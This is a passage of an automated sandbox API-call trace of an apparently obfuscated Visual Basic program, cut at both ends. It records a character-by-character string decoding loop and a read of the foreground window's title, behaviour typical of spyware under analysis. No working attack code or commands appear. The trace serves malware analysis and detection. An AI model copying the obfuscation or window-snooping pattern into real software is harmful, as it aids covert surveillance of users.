pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0086.751] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0086.751] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.752] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.752] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x", lpUsedDefaultChar=0x0) returned 1 [0086.753] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0086.753] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.754] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.754] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z", lpUsedDefaultChar=0x0) returned 1 [0086.754] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0086.755] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0086.755] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0086.755] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.756] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.756] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0086.757] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0086.757] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t", lpUsedDefaultChar=0x0) returned 1 [0086.757] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0086.758] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0086.758] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0086.759] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0086.759] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0086.759] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.760] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.760] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.761] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.761] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.762] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.762] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.763] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.763] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.763] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.764] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.764] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.764] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.765] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.765] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.766] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.766] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.766] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.766] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.767] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.768] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.768] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.768] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.769] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.769] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.770] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.770] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.771] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.771] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.771] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.772] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.772] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.772] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.773] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.773] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.774] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.774] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.774] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.774] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.775] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.775] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.775] GetForegroundWindow () returned 0x102c2 [0086.775] GetLastError () returned 0x0 [0086.776] SysStringLen (param_1=" ") returned 0xff [0086.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.776] SysStringLen (param_1=" ") returned 0xff [0086.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.776] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.776] GetLastError () returned 0x0 [0086.776] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.777] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.777] SysStringLen (param_1="Activity Arrive Event") returned 0x16 [0086.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Activity Arrive Event", cchWideChar=23, lpMultiByteStr=0xe3717c, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Activity Arrive Event", lpUsedDefaultChar=0x0) returned 23 [0086.777] SetWindowTextA (hWnd=0x2036e, lpString="Activity Arrive Event") returned 1 [0086.777] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0086.777] GetFocus () returned 0x0 [0086.777] lstrlenA (lpString="Activity Arrive Event") returned 21 [0086.777] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe3717c) returned 0x1 [0086.778] IsWindow (hWnd=0x2036e) returned 1 [0086.778] IsWindow (hWnd=0x2036e) returned 1 [0086.778] IsWindow (hWnd=0x2036e) returned 1 [0086.778] IsWindow (hWnd=0x2036e) returned 1 [0086.778] GetFocus () returned 0x0 [0086.779] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x15 [0086.779] GetFocus () returned 0x0 [0086.779] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x16) returned 0x3102b58 [0086.779] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x16, lParam=0x3102b58) returned 0x15 [0086.779] GetFocus () returned 0x0 [0086.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0086.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=-1, lpWideCharStr=0xe3717c, cchWideChar=22 | out: lpWideCharStr="Activity Arrive Event") returned 22 [0086.779] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102b58 | out: hHeap=0x30f0000) returned 1 [0086.779] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0086.780] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 